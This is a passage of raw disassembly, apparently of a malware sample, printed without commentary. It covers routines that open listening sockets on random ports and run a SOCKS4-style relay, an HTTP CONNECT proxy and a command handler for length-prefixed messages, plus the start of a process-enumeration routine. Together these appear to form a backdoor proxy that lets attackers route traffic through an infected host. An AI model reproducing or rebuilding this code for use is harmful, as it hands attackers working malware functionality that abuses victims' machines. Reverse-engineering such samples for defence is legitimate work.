mov eax, [ebp+6Ch+var_20]
sub eax, [ebp+6Ch+var_98]
push eax
mov eax, [ebp+6Ch+var_24]
sub eax, [ebp+6Ch+var_9C]
push eax
push [ebp+6Ch+var_18]
call dword_40FB24
lea eax, [ebp+6Ch+var_10]
push eax
push esi
push [ebp+6Ch+var_30]
mov [ebp+6Ch+var_10], esi
call [ebp+6Ch+var_40]
test eax, eax
jnz loc_407A05
cmp [ebp+6Ch+var_10], esi
jz loc_407A05
lea eax, [ebp+6Ch+var_8]
push eax
lea eax, [ebp+6Ch+var_4]
push eax
mov [ebp+6Ch+var_4], esi
mov [ebp+6Ch+var_8], esi
call [ebp+6Ch+var_4C]
test eax, eax
jnz loc_4079FF
cmp [ebp+6Ch+var_8], esi
jz loc_4079FF
cmp [ebp+6Ch+var_4], esi
jz loc_4079FF
push [ebp+6Ch+var_8]
call sub_4092F9
mov ebx, eax
cmp ebx, esi
pop ecx
jz loc_4079FF
push ebx
push [ebp+6Ch+var_8]
push [ebp+6Ch+var_4]
call [ebp+6Ch+var_38]
xor edi, edi
cmp [ebp+6Ch+var_4], esi
jbe short loc_407968
lea eax, [ebx+30h]
mov [ebp+6Ch+var_14], eax
loc_407933: ; CODE XREF: sub_407570+3DD�j
mov eax, [ebp+6Ch+var_14]
push dword ptr [eax]
push [ebp+6Ch+arg_0]
call dword_40FD88 ; lstrcmpiW
test eax, eax
jz short loc_407951
add [ebp+6Ch+var_14], 4Ch
inc edi
cmp edi, [ebp+6Ch+var_4]
jb short loc_407933
jmp short loc_407968
; ---------------------------------------------------------------------------
loc_407951: ; CODE XREF: sub_407570+3D3�j
imul edi, 4Ch
push 10h
add edi, ebx
lea eax, [ebp+6Ch+var_B0]
push edi
push eax
call sub_409331
add esp, 0Ch
mov [ebp+6Ch+var_8], esi
loc_407968: ; CODE XREF: sub_407570+3BB�j
; sub_407570+3DF�j
push ebx
call sub_409317
cmp [ebp+6Ch+var_8], esi
pop ecx
jnz loc_4079FF
lea eax, [ebp+6Ch+var_1C]
push eax
xor edi, edi
inc edi
push edi
push esi
call [ebp+6Ch+var_50]
test eax, eax
jnz short loc_4079FF
cmp [ebp+6Ch+var_1C], esi
jz short loc_4079FF
cmp [ebp+6Ch+arg_4], esi
mov [ebp+6Ch+var_7C], esi
jbe short loc_4079D0
push 10h
lea eax, [ebp+6Ch+var_78]
push offset dword_401380
push eax
call sub_409331
mov eax, [ebp+6Ch+var_7C]
imul eax, 1Ch
mov [ebp+eax+6Ch+var_64], 4
mov eax, [ebp+6Ch+var_7C]
imul eax, 1Ch
mov [ebp+eax+6Ch+var_68], edi
mov eax, [ebp+6Ch+var_7C]
imul eax, 1Ch
lea ecx, [ebp+6Ch+arg_4]
add esp, 0Ch
mov [ebp+eax+6Ch+var_60], ecx
inc [ebp+6Ch+var_7C]
loc_4079D0: ; CODE XREF: sub_407570+423�j
lea eax, [ebp+6Ch+var_7C]
push eax
lea eax, [ebp+6Ch+var_B0]
push eax
push [ebp+6Ch+var_1C]
push [ebp+6Ch+var_10]
call [ebp+6Ch+var_58]
test eax, eax
mov eax, [ebp+6Ch+var_1C]
jz short loc_4079F3
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
mov [ebp+6Ch+var_1C], esi
jmp short loc_4079FF
; ---------------------------------------------------------------------------
loc_4079F3: ; CODE XREF: sub_407570+476�j
mov edx, [eax]
push esi
push esi
push esi
xor ecx, ecx
push ecx
push eax
call dword ptr [edx+14h]
loc_4079FF: ; CODE XREF: sub_407570+381�j
; sub_407570+38A�j ...
push [ebp+6Ch+var_10]
call [ebp+6Ch+var_2C]
loc_407A05: ; CODE XREF: sub_407570+35F�j
; sub_407570+368�j
push [ebp+6Ch+var_5C]
push [ebp+6Ch+var_18]
call [ebp+6Ch+var_28]
push [ebp+6Ch+var_30]
call [ebp+6Ch+var_34]
loc_407A14: ; CODE XREF: sub_407570+2F1�j
push [ebp+6Ch+var_18]
call [ebp+6Ch+var_3C]
push [ebp+6Ch+var_C]
call [ebp+6Ch+var_3C]
push [ebp+6Ch+var_54]
call [ebp+6Ch+var_44]
loc_407A26: ; CODE XREF: sub_407570+261�j
; sub_407570+275�j
mov eax, [ebp+6Ch+var_1C]
pop ebx
jmp short loc_407A2E
; ---------------------------------------------------------------------------
loc_407A2C: ; CODE XREF: sub_407570+B7�j
; sub_407570+C0�j ...
xor eax, eax
loc_407A2E: ; CODE XREF: sub_407570+4BA�j
pop edi
pop esi
add ebp, 6Ch
leave
retn
sub_407570 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_407A35 proc near ; DATA XREF: sub_40826C+1A�o
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 12Ch
push ebx
push esi
push 1000h
call sub_4092F9
mov esi, [ebp+74h+arg_0]
xor ebx, ebx
cmp eax, ebx
pop ecx
mov [ebp+74h+var_C], eax
jz loc_407BB3
push 445C0h
push 8
lea eax, [ebp+74h+var_8]
push eax
push esi
call sub_405A8C
add esp, 10h
cmp eax, 8
jnz loc_407BB3
cmp [ebp+74h+var_8], 4
jnz loc_407BB3
cmp [ebp+74h+var_7], 1
jnz loc_407BB3
push ebx
push esi
call sub_405AF7
pop ecx
pop ecx
push edi
loc_407A98: ; CODE XREF: sub_407A35+7A�j
push ebx
xor edi, edi
inc edi
push edi
lea eax, [ebp+74h+arg_0+3]
push eax
push esi
call dword_40FCEC
cmp eax, edi
jnz short loc_407AB1
cmp byte ptr [ebp+74h+arg_0+3], bl
jnz short loc_407A98
loc_407AB1: ; CODE XREF: sub_407A35+75�j
push edi
push esi
call sub_405AF7
mov eax, [ebp+74h+var_4]
pop ecx
pop ecx
push 6
mov [ebp+74h+var_24], eax
mov ax, [ebp+74h+var_6]
push edi
push 2
mov [ebp+74h+var_28], 2
mov [ebp+74h+var_26], ax
mov [ebp+74h+var_8], bl
call dword_40FCD4
mov edi, eax
cmp edi, ebx
jz short loc_407AF7
push 10h
lea eax, [ebp+74h+var_28]
push eax
push edi
call dword_40FCF8
test eax, eax
mov [ebp+74h+var_7], 5Ah
jz short loc_407AFB
loc_407AF7: ; CODE XREF: sub_407A35+AB�j
mov [ebp+74h+var_7], 5Bh
loc_407AFB: ; CODE XREF: sub_407A35+C0�j
push ebx
push 8
lea eax, [ebp+74h+var_8]
push eax
push esi
call dword_40FCBC
cmp [ebp+74h+var_7], 5Ah
jnz loc_407B98
mov [ebp+74h+var_18], 118h
mov [ebp+74h+var_14], ebx
jmp short loc_407B69
; ---------------------------------------------------------------------------
loc_407B1F: ; CODE XREF: sub_407A35+132�j
dec [ebp+74h+var_12C]
mov eax, [ebp+74h+var_12C]
mov eax, [ebp+eax*4+74h+var_128]
cmp eax, esi
mov [ebp+74h+var_10], edi
jz short loc_407B3C
mov [ebp+74h+var_10], esi
loc_407B3C: ; CODE XREF: sub_407A35+102�j
push ebx
push 1000h
push [ebp+74h+var_C]
push eax
call dword_40FCEC
cmp eax, 1
jl short loc_407B98
push ebx
push eax
push [ebp+74h+var_C]
push [ebp+74h+var_10]
call dword_40FCBC
jmp short loc_407B93
; ---------------------------------------------------------------------------
loc_407B61: ; CODE XREF: sub_407A35+161�j
cmp [ebp+74h+var_12C], ebx
jnz short loc_407B1F
loc_407B69: ; CODE XREF: sub_407A35+E8�j
lea eax, [ebp+74h+var_18]
push eax
push ebx
push ebx
lea eax, [ebp+74h+var_12C]
push eax
push ebx
mov [ebp+74h+var_12C], 2
mov [ebp+74h+var_128], esi
mov [ebp+74h+var_124], edi
call dword_40FCF4
loc_407B93: ; CODE XREF: sub_407A35+12A�j
cmp eax, 1
jge short loc_407B61
loc_407B98: ; CODE XREF: sub_407A35+D8�j
; sub_407A35+11A�j
cmp edi, ebx
jz short loc_407BB2
cmp [ebp+74h+var_7], 5Ah
jnz short loc_407BAB
push 2
push edi
call dword_40FCE8
loc_407BAB: ; CODE XREF: sub_407A35+16B�j
push edi
call dword_40FCC0
loc_407BB2: ; CODE XREF: sub_407A35+165�j
pop edi
loc_407BB3: ; CODE XREF: sub_407A35+22�j
; sub_407A35+3F�j ...
push [ebp+74h+var_C]
call sub_409317
pop ecx
push 2
push esi
call dword_40FCE8
push esi
call dword_40FCC0
dec dword_40FAB4
pop esi
pop ebx
add ebp, 74h
leave
retn 4
sub_407A35 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407BDB proc near ; DATA XREF: sub_40826C+2B�o
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_2C = dword ptr -2Ch
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 30h
push esi
push 1000h
call sub_4092F9
mov esi, eax
test esi, esi
pop ecx
jz loc_407EB3
loc_407BF7: ; CODE XREF: sub_407BDB+4B�j
push 445C0h
push 0FFFh
push esi
push [ebp+arg_0]
call sub_405B22
add esp, 10h
test eax, eax
mov [ebp+var_18], eax
jle loc_407E92
cmp eax, 2
jnz short loc_407C28
cmp byte ptr [esi], 0Dh
jnz short loc_407C28
cmp byte ptr [esi+1], 0Ah
jz short loc_407BF7
loc_407C28: ; CODE XREF: sub_407BDB+40�j
; sub_407BDB+45�j
add eax, esi
cmp byte ptr [eax-1], 0Ah
jnz loc_407E92
cmp byte ptr [eax-2], 0Dh
jnz loc_407E92
push ebx
push edi
push 8
push 8
push offset aConnect ; "CONNECT "
push esi
mov byte ptr [eax], 0
call sub_408F6D
add esp, 10h
test eax, eax
setnz [ebp+var_1]
xor edi, edi
cmp [ebp+var_1], 1
push 20h
jnz short loc_407CA4
push esi
call sub_40910D
mov ebx, eax
test ebx, ebx
pop ecx
pop ecx
jz loc_407E90
inc ebx
cmp byte ptr [ebx], 2Fh
jnz short loc_407C83
mov [ebp+var_1], 2
jmp short loc_407CB9
; ---------------------------------------------------------------------------
loc_407C83: ; CODE XREF: sub_407BDB+A0�j
push 7
push 7
push offset aHttp ; "http://"
push ebx
call sub_408F6D
add esp, 10h
test eax, eax
jnz loc_407E90
add ebx, 7
push 2Fh
jmp short loc_407CA7
; ---------------------------------------------------------------------------
loc_407CA4: ; CODE XREF: sub_407BDB+88�j
lea ebx, [esi+8]
loc_407CA7: ; CODE XREF: sub_407BDB+C7�j
push ebx
call sub_40910D
mov edi, eax
test edi, edi
pop ecx
pop ecx
jz loc_407E90
loc_407CB9: ; CODE XREF: sub_407BDB+A6�j
xor eax, eax
cmp edi, eax
mov [ebp+var_C], eax
mov [ebp+var_10], eax
mov [ebp+var_14], eax
mov [ebp+var_8], eax
mov [ebp+var_20], 50h
jz short loc_407CE8
sub edi, ebx
push edi
push ebx
call sub_40A747
test eax, eax
pop ecx
pop ecx
mov [ebp+var_8], eax
jz loc_407E90
loc_407CE8: ; CODE XREF: sub_407BDB+F5�j
push [ebp+var_18]
push esi
call sub_40A747
push 445C0h
push 0FFFh
push esi
push [ebp+arg_0]
mov [ebp+var_18], eax
call sub_405B22
add esp, 18h
jmp loc_407E66
; ---------------------------------------------------------------------------
loc_407D0F: ; CODE XREF: sub_407BDB+294�j
cmp edi, 2
jnz short loc_407D23
cmp byte ptr [esi], 0Dh
jnz short loc_407D23
cmp byte ptr [esi+1], 0Ah
jz loc_407EB8
loc_407D23: ; CODE XREF: sub_407BDB+137�j
; sub_407BDB+13C�j
cmp [ebp+var_1], 0
jz short loc_407D86
cmp edi, 19h
jle short loc_407D4A
cmp [ebp+var_1], 1
jnz short loc_407D4A
push 12h
push 12h
push offset aProxyConnectio ; "Proxy-Connection: "
push esi
call sub_408F6D
add esp, 10h
test eax, eax
jz short loc_407D6B
loc_407D4A: ; CODE XREF: sub_407BDB+151�j
; sub_407BDB+157�j
cmp edi, 10h
jle short loc_407D86
cmp [ebp+var_1], 2
jnz short loc_407D86
push 0Ch
push 0Ch
push offset aConnection ; "Connection: "
push esi
call sub_408F6D
add esp, 10h
test eax, eax
jnz short loc_407D86
loc_407D6B: ; CODE XREF: sub_407BDB+16D�j
xor eax, eax
push eax
push eax
push eax
push edi
push esi
push 0Ch
push offset aKeepAlive ; "*keep-alive*"
call sub_408CFB
add esp, 1Ch
jmp loc_407E50
; ---------------------------------------------------------------------------
loc_407D86: ; CODE XREF: sub_407BDB+14C�j
; sub_407BDB+172�j ...
push 6
pop ebx
cmp edi, ebx
jle short loc_407DA5
push ebx
push ebx
push offset aProxy ; "Proxy-"
push esi
call sub_408F6D
add esp, 10h
test eax, eax
jz loc_407E50
loc_407DA5: ; CODE XREF: sub_407BDB+1B0�j
cmp [ebp+var_1], 2
jnz short loc_407DDE
cmp edi, ebx
jle short loc_407DDE
push 0FFFFFFFFh
push ebx
push offset aHost ; "Host: "
push esi
call sub_408F6D
add esp, 10h
test eax, eax
jnz short loc_407DDE
lea eax, [edi-8]
push eax
lea eax, [esi+6]
push eax
call sub_40A747
test eax, eax
pop ecx
pop ecx
mov [ebp+var_8], eax
jz loc_407E75
loc_407DDE: ; CODE XREF: sub_407BDB+1CE�j
; sub_407BDB+1D2�j ...
cmp edi, 0Fh
jle short loc_407E16
push 0FFFFFFFFh
push 10h
push offset aContentLength ; "Content-Length: "
push esi
call sub_408F6D
add esp, 10h
test eax, eax
jnz short loc_407E16
lea eax, [esi+10h]
jmp short loc_407DFF
; ---------------------------------------------------------------------------
loc_407DFE: ; CODE XREF: sub_407BDB+227�j
inc eax
loc_407DFF: ; CODE XREF: sub_407BDB+221�j
cmp byte ptr [eax], 20h
jz short loc_407DFE
push eax
call sub_409054
test eax, eax
pop ecx
mov [ebp+var_C], eax
jge short loc_407E16
and [ebp+var_C], 0
loc_407E16: ; CODE XREF: sub_407BDB+206�j
; sub_407BDB+21C�j ...
mov eax, [ebp+var_14]
lea ebx, [eax+edi]
cmp ebx, 0FFFFh
ja loc_407EB8
lea eax, [ebx+1]
push eax
push [ebp+var_10]
call sub_40A91F
test eax, eax
pop ecx
pop ecx
jz short loc_407EB8
mov ecx, [ebp+var_14]
push edi
add ecx, eax
push esi
push ecx
mov [ebp+var_10], eax
call sub_409331
add esp, 0Ch
mov [ebp+var_14], ebx
loc_407E50: ; CODE XREF: sub_407BDB+1A6�j
; sub_407BDB+1C4�j
push 445C0h
push 0FFFh
push esi
push [ebp+arg_0]
call sub_405B22
add esp, 10h
loc_407E66: ; CODE XREF: sub_407BDB+12F�j
mov edi, eax
cmp edi, 1
mov byte ptr [edi+esi], 0
jge loc_407D0F
loc_407E75: ; CODE XREF: sub_407BDB+1FD�j
; sub_407BDB+2E1�j
push [ebp+var_8]
call sub_409317
push [ebp+var_10]
loc_407E80: ; CODE XREF: sub_407BDB+4A8�j
call sub_409317
push [ebp+var_18]
call sub_409317
add esp, 0Ch
loc_407E90: ; CODE XREF: sub_407BDB+96�j
; sub_407BDB+BC�j ...
pop edi
pop ebx
loc_407E92: ; CODE XREF: sub_407BDB+37�j
; sub_407BDB+53�j ...
push esi
call sub_409317
pop ecx
push 2
push [ebp+arg_0]
call dword_40FCE8
push [ebp+arg_0]
call dword_40FCC0
dec dword_40FAB4
loc_407EB3: ; CODE XREF: sub_407BDB+16�j
pop esi
leave
retn 4
; ---------------------------------------------------------------------------
loc_407EB8: ; CODE XREF: sub_407BDB+142�j
; sub_407BDB+247�j ...
cmp [ebp+var_8], 0
jz short loc_407E75
push 3Ah
push [ebp+var_8]
call sub_40910D
mov edi, eax
test edi, edi
pop ecx
pop ecx
jz short loc_407EE2
lea eax, [edi+1]
push eax
call sub_409054
pop ecx
movzx eax, ax
mov byte ptr [edi], 0
jmp short loc_407EE5
; ---------------------------------------------------------------------------
loc_407EE2: ; CODE XREF: sub_407BDB+2F3�j
mov eax, [ebp+var_20]
loc_407EE5: ; CODE XREF: sub_407BDB+305�j
push [ebp+var_8]
rol ax, 8
mov [ebp+var_30], 2
mov [ebp+var_2E], ax
call dword_40FCFC
cmp eax, 0FFFFFFFFh
mov [ebp+var_1C], eax
jnz short loc_407F24
push [ebp+var_8]
call dword_40FD00
test eax, eax
jz short loc_407F24
mov eax, [eax+0Ch]
push 4
push dword ptr [eax]
lea eax, [ebp+var_1C]
push eax
call sub_409331
add esp, 0Ch
loc_407F24: ; CODE XREF: sub_407BDB+327�j
; sub_407BDB+334�j
mov eax, [ebp+var_1C]
push 6
push 1
push 2
mov [ebp+var_2C], eax
call dword_40FCD4
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_408068
push 10h
lea eax, [ebp+var_30]
push eax
push ebx
call dword_40FCF8
test eax, eax
jnz loc_408068
cmp [ebp+var_1], al
jnz short loc_407F76
push eax
push 28h
push offset aHttp1_0200Conn ; "HTTP/1.0 200 Connection established\r\n\r\n"...
push [ebp+arg_0]
call dword_40FCBC
push esi
push [ebp+arg_0]
push ebx
jmp loc_408060
; ---------------------------------------------------------------------------
loc_407F76: ; CODE XREF: sub_407BDB+37E�j
xor edi, edi
push edi
push [ebp+var_18]
call dword_40FD94 ; lstrlenA
push eax
push [ebp+var_18]
push ebx
call dword_40FCBC
push edi
push [ebp+var_14]
push [ebp+var_10]
push ebx
call dword_40FCBC
push edi
push 2
push offset dword_401314
push ebx
call dword_40FCBC
cmp [ebp+var_C], edi
jle short loc_408028
mov [ebp+var_14], edi
loc_407FB2: ; CODE XREF: sub_407BDB+3FF�j
push edi
push 1000h
push esi
push [ebp+arg_0]
call dword_40FCEC
cmp eax, 1
jl short loc_408028
add [ebp+var_14], eax
push edi
push eax
push esi
push ebx
call dword_40FCBC
mov eax, [ebp+var_C]
cmp [ebp+var_14], eax
jl short loc_407FB2
jmp short loc_408028
; ---------------------------------------------------------------------------
loc_407FDE: ; CODE XREF: sub_407BDB+46A�j
cmp edi, 0Fh
jle short loc_40800B
push 0FFFFFFFFh
push 10h
push offset aContentLength ; "Content-Length: "
push esi
call sub_408F6D
add esp, 10h
test eax, eax
jnz short loc_40800B
lea eax, [esi+10h]
jmp short loc_407FFF
; ---------------------------------------------------------------------------
loc_407FFE: ; CODE XREF: sub_407BDB+427�j
inc eax
loc_407FFF: ; CODE XREF: sub_407BDB+421�j
cmp byte ptr [eax], 20h
jz short loc_407FFE
push eax
call sub_409054
pop ecx
loc_40800B: ; CODE XREF: sub_407BDB+406�j
; sub_407BDB+41C�j
cmp edi, 2
jnz short loc_40801B
cmp byte ptr [esi], 0Dh
jnz short loc_40801B
cmp byte ptr [esi+1], 0Ah
jz short loc_408049
loc_40801B: ; CODE XREF: sub_407BDB+433�j
; sub_407BDB+438�j
push 0
push edi
push esi
push [ebp+arg_0]
call dword_40FCBC
loc_408028: ; CODE XREF: sub_407BDB+3D2�j
; sub_407BDB+3EA�j ...
push 445C0h
push 0FFFh
push esi
push ebx
call sub_405B22
mov edi, eax
add esp, 10h
cmp edi, 1
mov byte ptr [edi+esi], 0
jge short loc_407FDE
jmp short loc_40805B
; ---------------------------------------------------------------------------
loc_408049: ; CODE XREF: sub_407BDB+43E�j
push 0
push 15h
push offset aConnectionClos ; "Connection: close\r\n\r\n"
push [ebp+arg_0]
call dword_40FCBC
loc_40805B: ; CODE XREF: sub_407BDB+46C�j
push esi
push ebx
push [ebp+arg_0]
loc_408060: ; CODE XREF: sub_407BDB+396�j
call sub_405B68
add esp, 0Ch
loc_408068: ; CODE XREF: sub_407BDB+360�j
; sub_407BDB+375�j
push 2
push ebx
call dword_40FCE8
push ebx
call dword_40FCC0
push [ebp+var_10]
call sub_409317
push [ebp+var_8]
jmp loc_407E80
sub_407BDB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408088 proc near ; DATA XREF: sub_40826C+3C�o
var_5C = byte ptr -5Ch
var_54 = byte ptr -54h
var_50 = dword ptr -50h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5Ch
push ebx
push esi
mov esi, 2710h
push esi
push 4
pop ebx
push ebx
lea eax, [ebp+var_10]
push eax
push [ebp+arg_0]
call sub_405A8C
add esp, 10h
cmp eax, ebx
jnz loc_40824C
push esi
push ebx
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_405A8C
add esp, 10h
cmp eax, ebx
jnz loc_40824C
cmp [ebp+var_4], 0FFFFh
ja loc_40824C
push edi
push [ebp+var_4]
call sub_4092F9
xor edi, edi
cmp eax, edi
pop ecx
mov [ebp+var_C], eax
jz loc_40824B
push esi
push [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_405A8C
add esp, 10h
cmp eax, [ebp+var_4]
jnz loc_408242
cmp [ebp+var_10], 0Ah
jz short loc_408143
cmp [ebp+var_10], 14h
jnz loc_408242
cmp [ebp+var_4], ebx
jb loc_408242
push edi
push [ebp+var_4]
push [ebp+var_C]
push [ebp+arg_0]
call dword_40FCBC
cmp eax, [ebp+var_4]
jnz loc_408242
call sub_40A0CC
jmp loc_408242
; ---------------------------------------------------------------------------
loc_408143: ; CODE XREF: sub_408088+83�j
mov eax, dword_40FB34
mov [ebp+var_14], 32h
push dword ptr [eax+88h]
call sub_40A7E1
cmp [ebp+var_4], ebx
pop ecx
mov [ebp+var_8], eax
jb short loc_40818F
push ebx
push [ebp+var_C]
lea eax, [ebp+var_14]
push eax
call sub_409331
mov eax, [ebp+var_4]
add esp, 0Ch
cmp eax, ebx
jbe short loc_40818F
add eax, 0FFFFFFFCh
push eax
mov eax, [ebp+var_C]
add eax, 4
push eax
call sub_40A791
pop ecx
pop ecx
mov [ebp+var_8], eax
loc_40818F: ; CODE XREF: sub_408088+D9�j
; sub_408088+F0�j
cmp [ebp+var_8], edi
jz loc_408242
push edi
push [ebp+var_14]
push [ebp+var_8]
call sub_407570
mov ebx, eax
add esp, 0Ch
cmp ebx, edi
jz loc_408239
mov eax, [ebx]
push 1
lea ecx, [ebp+var_5C]
push ecx
push ebx
call dword ptr [eax+30h]
test eax, eax
jnz short loc_408233
push edi
push 8
lea eax, [ebp+var_54]
push eax
push [ebp+arg_0]
mov [ebp+var_50], 1000h
call dword_40FCBC
push [ebp+var_50]
call sub_4092F9
mov edi, eax
test edi, edi
pop ecx
jz short loc_408233
loc_4081E7: ; CODE XREF: sub_408088+1A2�j
mov eax, [ebx]
lea ecx, [ebp+var_4]
push ecx
push [ebp+var_50]
push edi
push ebx
call dword ptr [eax+0Ch]
test eax, eax
jnz short loc_40822C
cmp [ebp+var_4], eax
jz short loc_40822C
push eax
push [ebp+var_4]
push edi
push [ebp+arg_0]
call dword_40FCBC
cmp eax, 0FFFFFFFFh
jz short loc_40822C
push esi
push 4
push edi
push [ebp+arg_0]
call sub_405A8C
add esp, 10h
cmp eax, 4
jnz short loc_40822C
mov eax, [edi]
cmp eax, [ebp+var_50]
jz short loc_4081E7
loc_40822C: ; CODE XREF: sub_408088+16F�j
; sub_408088+174�j ...
push edi
call sub_409317
pop ecx
loc_408233: ; CODE XREF: sub_408088+137�j
; sub_408088+15D�j
mov eax, [ebx]
push ebx
call dword ptr [eax+8]
loc_408239: ; CODE XREF: sub_408088+123�j
push [ebp+var_8]
call sub_409317
pop ecx
loc_408242: ; CODE XREF: sub_408088+79�j
; sub_408088+89�j ...
push [ebp+var_C]
call sub_409317
pop ecx
loc_40824B: ; CODE XREF: sub_408088+60�j
pop edi
loc_40824C: ; CODE XREF: sub_408088+23�j
; sub_408088+3C�j ...
push 2
push [ebp+arg_0]
call dword_40FCE8
push [ebp+arg_0]
call dword_40FCC0
dec dword_40FAB4
pop esi
pop ebx
leave
retn 4
sub_408088 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_40826C proc near ; DATA XREF: sub_4086F4+73�o
; sub_419C1A+73�o
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
lea ebp, [esp-74h]
sub esp, 134h
push ebx
xor eax, eax
push esi
push edi
mov [ebp+74h+var_28], eax
mov [ebp+74h+var_24], offset word_40FAC0
mov [ebp+74h+var_20], offset sub_407A35
mov [ebp+74h+var_1C], eax
mov [ebp+74h+var_18], offset word_40FAC2
mov [ebp+74h+var_14], offset sub_407BDB
mov [ebp+74h+var_10], eax
mov [ebp+74h+var_C], offset word_40FAC4
mov [ebp+74h+var_8], offset sub_408088
lea edi, [ebp+74h+var_28]
mov [ebp+74h+var_4], 3
mov ebx, 0FA0h
loc_4082BE: ; CODE XREF: sub_40826C+A0�j
push 2328h
push ebx
call sub_409B94
movzx esi, ax
push esi
call sub_405A22
add esp, 0Ch
test eax, eax
mov [edi], eax
jnz short loc_408300
loc_4082DB: ; CODE XREF: sub_40826C+90�j
push 28h
call dword_40FD68 ; Sleep
push 2328h
push ebx
call sub_409B94
movzx esi, ax
push esi
call sub_405A22
add esp, 0Ch
test eax, eax
jz short loc_4082DB
mov [edi], eax
loc_408300: ; CODE XREF: sub_40826C+6D�j
mov eax, [edi+4]
add edi, 0Ch
dec [ebp+74h+var_4]
mov [eax], si
jnz short loc_4082BE
push 64h
pop eax
xor edi, edi
mov [ebp+74h+var_30], edi
mov [ebp+74h+var_2C], eax
push eax
jmp loc_4083DD
; ---------------------------------------------------------------------------
loc_40831F: ; CODE XREF: sub_40826C+17F�j
push 3
pop edx
mov [ebp+74h+var_134], edx
xor ecx, ecx
lea eax, [ebp+74h+var_28]
loc_40832D: ; CODE XREF: sub_40826C+D0�j
mov esi, [eax]
mov [ebp+ecx*4+74h+var_130], esi
inc ecx
add eax, 0Ch
cmp ecx, edx
jb short loc_40832D
lea eax, [ebp+74h+var_30]
push eax
push edi
push edi
lea eax, [ebp+74h+var_134]
push eax
push edi
call dword_40FCF4
cmp eax, 0FFFFFFFFh
jz loc_4083F1
cmp eax, edi
jle short loc_4083DB
jmp short loc_4083CD
; ---------------------------------------------------------------------------
loc_408361: ; CODE XREF: sub_40826C+167�j
dec [ebp+74h+var_134]
mov eax, [ebp+74h+var_134]
mov ecx, [ebp+eax*4+74h+var_130]
xor esi, esi
lea eax, [ebp+74h+var_28]
loc_408379: ; CODE XREF: sub_40826C+118�j
cmp ecx, [eax]
jz short loc_408388
inc esi
add eax, 0Ch
cmp esi, 3
jb short loc_408379
jmp short loc_4083CD
; ---------------------------------------------------------------------------
loc_408388: ; CODE XREF: sub_40826C+10F�j
imul esi, 0Ch
push edi
push edi
push [ebp+esi+74h+var_28]
call dword_40FCE0
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_4083CD
inc dword_40FAB4
push edi
push edi
push ebx
push [ebp+esi+74h+var_20]
push edi
push edi
call dword_40FE10 ; CreateThread
cmp eax, edi
jnz short loc_4083C6
push ebx
call dword_40FCC0
dec dword_40FAB4
jmp short loc_4083CD
; ---------------------------------------------------------------------------
loc_4083C6: ; CODE XREF: sub_40826C+149�j
push eax
call dword_40FDAC ; CloseHandle
loc_4083CD: ; CODE XREF: sub_40826C+F3�j
; sub_40826C+11A�j ...
cmp [ebp+74h+var_134], edi
jnz short loc_408361
dec [ebp+74h+var_134]
loc_4083DB: ; CODE XREF: sub_40826C+F1�j
push 64h
loc_4083DD: ; CODE XREF: sub_40826C+AE�j
push dword_40FAB8
call dword_40FDB8 ; WaitForSingleObject
test eax, eax
jnz loc_40831F
loc_4083F1: ; CODE XREF: sub_40826C+E9�j
push 3
lea esi, [ebp+74h+var_28]
pop edi
loc_4083F7: ; CODE XREF: sub_40826C+197�j
push dword ptr [esi]
call dword_40FCC0
add esi, 0Ch
dec edi
jnz short loc_4083F7
dec dword_40FAB4
pop edi
pop esi
pop ebx
add ebp, 74h
leave
retn
sub_40826C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408413 proc near ; CODE XREF: sub_4086F4+58�p
var_23C = dword ptr -23Ch
var_234 = dword ptr -234h
var_218 = byte ptr -218h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 23Ch
mov eax, dword_40FB34
push ebx
push esi
push edi
xor esi, esi
push esi
push esi
push esi
push esi
push 4
push dword ptr [eax+30h]
call sub_4095AA
add esp, 18h
mov [ebp+var_C], eax
call dword_40FE50 ; GetCurrentThread
mov ebx, eax
push ebx
call dword_40FE4C ; GetThreadPriority
push 1
push ebx
mov [ebp+var_10], eax
call dword_40FE48 ; SetThreadPriority
mov [ebp+var_8], 3
loc_40845C: ; CODE XREF: sub_408413+E4�j
push esi
push 2
mov [ebp+var_23C], 22Ch
call dword_40FE14 ; CreateToolhelp32Snapshot
lea ecx, [ebp+var_23C]
push ecx
push eax
mov [ebp+var_4], eax
call dword_40FE18 ; Process32FirstW
jmp short loc_4084E7
; ---------------------------------------------------------------------------
loc_408482: ; CODE XREF: sub_408413+D6�j
mov eax, [ebp+var_234]
cmp eax, esi
jz short loc_4084D7
cmp eax, dword_40FCA4
jz short loc_4084D7
